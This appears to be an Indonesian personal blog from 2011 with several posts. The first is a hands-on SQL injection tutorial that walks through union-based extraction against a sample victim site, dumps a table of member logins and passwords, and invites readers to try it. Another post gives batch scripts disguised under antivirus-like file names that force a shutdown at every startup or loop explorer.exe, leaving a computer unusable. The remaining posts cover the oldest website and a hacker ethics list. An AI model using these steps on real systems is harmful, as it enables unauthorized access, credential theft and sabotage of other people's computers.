Sabtu, 25 Juni 2011

SQL Injection

tentukan target contohnya :
Target : http://www.korban.com/index.php?id=14

1. Cek bug pada suatu website dengan menambahkan single quote ( ' ) dibelakang url, ternyata terdapat bug pada http://www.korban.com

http://www.korban.com/index.php?id=14’

muncul pesan error: MySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' order by a.content_order Asc' at line 1)


2. Untuk mencari column gunakan perintah [order by].order+by+1--dimulai dengan angka 1, selanjutnya 2, dst sampe muncul pesan errorpada target kita kali ini, error muncul pada angka 6. MySQL Error: 1054 (Unknown column '6' in 'order clause')

http://www.korban.com/index.php?id=14+order+by+5--

jadi angka yang diambil adalah 6-1 = 5 (jumlah column adalah 5)


3. Selanjutnya kita akan mencari "angka ajaib" dimana kita bisa melakukan injection dengan perintah [union all select]. Jangan lupa tambahkan tanda kurang ( - ) didepan angka parameter id=14 menjadi id=-14

http://www.korban.com/index.php?id=-14+union+all+select+1,2,3,4,5--

akan muncul "angka ajaib" : 2

4. Selanjutnya kita cari versi Database MySql-nya dengan perintah "version()" pada angka 2.

http://www.korban.com/index.php?id=-14+union+all+select+1,version(),3,4,5--

muncul tulisan :5.0.51a-community


5. Selanjutnya kita akan mencari table-nya dgn perintah "group_concat(table_name)" pada salah satu angka ajaib dan " from information_schema.tables where table_schema=database()--" di belakang angka 5

http://www.natoleo.com/Content.php?id=-14+union+all+select+1,group_concat(table_name),3,4,5+from+information_schema.tables+where+table_schema=database()--

muncul nama-nama table: ad_categories,ads,alaris_menu,alaris_sub2_menu,alaris_sub_menu,alaris_users,articles,categories,category_types,club_statuses,config,content,course_welcome,emails,er_setting,event_registrations,events,forums,headercontent,kiteads_acls,kiteads_adclicks,kiteads_adstats,kiteads_adviews,kiteads_affiliates,kiteads_banners,kiteads_cache,kiteads_clients,kiteads_config,kiteads_images,kiteads_session,kiteads_targetstats,kiteads_userlog,kiteads_zones,link_categories,links,links2,linkspic,lookup_countries,lookup_states,members,messages,news,newsletter,pack_grp,pack_lists,package,products,users_group,welcome


6. Selanjutnya kita cari column dari table yg ada hubungannya dengan user dan password,kali ini kita ambil table "members"sebelumnya kita convert dulu ke hexa agar dapat dibaca oleh Sql di sini : http://www.string-functions.com/string-hex.aspx pada ascii text ketik members lalu klik encode. hasilnya di kolom Hex Value : 6D656D62657273

Perintah selanjutnya adalah "group_concat(column_name)" pada angka ajaib 2 dan " from information_schema.columns where table_name=0xHexa--" di akhir URL yaitu 6D656D62657273

tambahkan 0x didepan hexa agar server dapat mengetahui bahwa itu telah diconvertke hexa.

http://www.korban.com/index.php?id=-14+union+all+select+1,group_concat(column_name),3,4,5+from+information_schema.columns+where+table_name=0x6D656D62657273--

muncul column: member_id,member_first_name,member_last_name,member_login,member_password,member_email,country_id,state_id,member_city,member_zip,member_address1,member_address2,member_address3,member_ph_work,member_ph_work_ext,member_phone_home,member_phone_addl,member_fax,picture_url,website_url,club_status_id,member_date_added,security_level_id

kita ambil : member_login,member_password


7. Untuk melihat isi dari kedua column tersebut gunakan perintah "group_concat(column1,0x3a,column2)" pada angka ajaib 1 dan from NAMATABLE-- pada akhir URL

ganti column1 dengan "member_login" dan column2 dengan "member_password". 0x3a adalah tanda titik dua ( : ) yang telah diconvert ke hexa. NAMA TABLE diganti dengan "members" untuk mengambil informasi dari table yang bernama"members"

http://www.korban.com/index.php?id=-14+union+all+select+1,group_concat(member_login,0x3a,member_password),3,4,5+from+members--

hasilnya akan muncul:

user: aloneyone

pass: clubing7yui

sekarang tinggal login ke website target..

http://www.korban.com/admin/
nah untuk mencari page adminnya silahkan gunakan cara yang banyak di google,,,
thank you,,, silahkan mencoba,,,,
Diposting oleh di Tidak ada komentar:

Kamis, 31 Maret 2011

Shutdown Komputer Untuk Selamanya (Menambahkan Title Pada Komputer Menjadi Alm)

Setelah kesana kemari klak-klik mouse dan pencat-pencet keyboard,, akhirnya nemu juga tulisan buat di posting,, jujur ini bukan tulisan saya,, hanya saja saya menemukannya di sini ,,, mungkin ini bisa di bilang sebuah trik tapi jangan di pakai di komputer sendiri kecuali sudah terinstal deep freezer di komputer kamu,,, ini bukan trik yang baik tapi niatnya kan bukan untuk kejahatan tapi untuk menambah wawasan kita tentang pengetahuan komputer,,,, ini bisa juga di bilang sebuah virus yang beretika,,, oke dariada berlama-lama baca tulisan saya yang gak ada ujungnya mendingan langsung aja yaa,,,,
oke,,, ketikkan di notepad :
start shutdown.exe -f -t 0 -s atau start logoff.exe
save jd symantec.bat atau norton.cmd
terus jadikan start up ,, sederhana kan ...??
selain cara itu ada juga cara yang lain,, kalo cara yang ini jangan di komputer sendiri ya,,, very very dangerous,, kecuali sudah terinstall deep freezer,,, itupun saya gak yakin,,,,

[color=#FF0000]:start
@echo off
explorer.exe
goto start[/color]

kemudian save As dengan extension BAT,,,
beres deh,,,,, kata siapa beres,,,????  enak aja,,, nih ada lagi,,,

Eh, ada lagi :

@ echo off
shutdown.exe -s -t 3 -c "bye bye"

di save kasih nama sesuka kamu tapi ekstensi .bat terus ditaruh di startup , jadi tiap nyala langsung mati,
jadi ga punya kesempatan buat ngetik shutdown.exe
oke bagi yang udah bosen punya komputer silahkan di coba,,,,, maka komputer kamu akan menjadi Alm / almarhum.....
:) :) :)
di dapat dari : http://www.white-hacker.tk/2010/03/shut-down-komputer-untuk-selamanya.html

Diposting oleh di Tidak ada komentar:

Rabu, 23 Maret 2011





Diposting oleh di Tidak ada komentar:

Website Tertua Di Dunia

Suatu malam setelah melakukan berbagai aktifitas di dunia maya yang melelahkan maka saya iseng-iseng cari website tertua di dunia,,,,
Sekedar buat info aja, Kemarin malam saya dapat ilham pengen tau website pertama di dunia maya ini. Search on google and pencarian pun sukses... kira2 website apa ya?? bentuknya seperti apa ya? ataukah sebagus dan seindah website kamu? ataukah biasa ? atau kah bisa membuat orang yang melihatnya merasa wah??? oke daripada bingung dan penasaran gimana sih bentuk dari website yang di bilang tertua di dunia itu? mari jalankan scroll anda kebawah untuk melihat lebih lanjut... berikut hasilnya : :)
Ternyata Website tertua di dunia adalah  http://info.cern.ch/ dibuka.Memang sih isi nya ga menarik tetapi situs web ini adalah situs tertua di dunia . bisa di bilang mbahnya website-website yag lain....
dan ingin tau gak domain yang tertua di dunia ???
ternyata http://simbolic.com/ adalah domain tertua di internet, Diregister pada 15 Maret 1985.Namun, pada tanggal 27 Agustus 2009, dijual kepada XF.com
Symbolics 3600
Diposting oleh di Tidak ada komentar:

Etika Hacker

Tak hanya di kampus di sekolah di rumah dan bahkan di lingkungan sehari-hari kita harus beretika tapi di dalam dunia maya seperti seorang hacker juga mempunyai etika dan aturan mainnya,,, jadi penasaran gimana sih etika seorang hacker... :)
mari langsung aja ke TKP gan.......... :)

1. Memiliki kemampuan mengakses komputer tanpa batasan.
2. Semua informasi yg diberikan tidak boleh dipungut bayaran apapun. Tidak ada yg boleh disembunyikan, dan di tutup tutupi.
3. Tidak percaya pada otoritas, artinya memperluas desentralisasi.
4. Tidak memakai identitas palsu, seperti nama samaran yang konyol, umur, posisi, dll.
5. Mampu berseni dikomputer
6. Komputer dapat mengubah hidup menjadi lebih baik.
7. Pekerjaan yang di lakukan semata-mata demi kebenaran informasi yang harus disebarluaskan.
8. Memegang teguh komitmen tidak membela dominasi ekonomi industri software tertentu.
9. Hacking adalah senjata mayoritas dalam perang melawan pelanggaran batas teknologi komputer.
10. Baik Hacking maupun Phreaking adalah satu-satunya jalan lain untuk menyebarkan informasi pada massa agar tak gagap dalam komputer.

Setelah itu ini adalah cara main hacker, dalam artian hacker bukan berarti membabibuta menyerang tanpa pikir ::

* Di atas segalanya, hormati pengetahuan & kebebasan informasi.
* Memberitahukan sistem administrator akan adanya pelanggaran keamanan / lubang maupun celah di keamanan yang anda lihat. Seperti Bug, dll.
* Jangan mengambil keuntungan yang tidak fair dari hack. Semata mata untuk kepuasan sendiri
* Tidak mendistribusikan & mengumpulkan software bajakan. Tanpa maksud tertentu
* Tidak pernah mengambil resiko yang ceroboh dan selalu mengetahui kemampuan sendiri. Tidak brutal dalam melakukan aktifitas hack.
* Selalu bersedia untuk secara terbuka / bebas / gratis memberitahukan & mengajarkan berbagai informasi & metoda yang diperoleh secara cuma cuma, tampa pamrih
* Tidak pernah meng-hack sebuah sistem untuk mencuri uang.
* Tidak pernah memberikan akses ke seseorang yang akan membuat kerusakan.
* Tidak pernah secara sengaja menghapus & merusak file di komputer yang dihack. Keculai maksud tertentu
* Hormati mesin yang di hack, dan memperlakukan dia seperti mesin sendiri.

Seorang Hacker sejati akan selalu bertindak berlandaskan kode etik dan aturan main seorang hacker.
ayo tunjukkan pada dunia bahwa hacker tidak sejelek yang dunia pikirkan,, karena hacker juga manusia yang harus di hormati......
Diposting oleh di Tidak ada komentar:
Langganan: Postingan (Atom)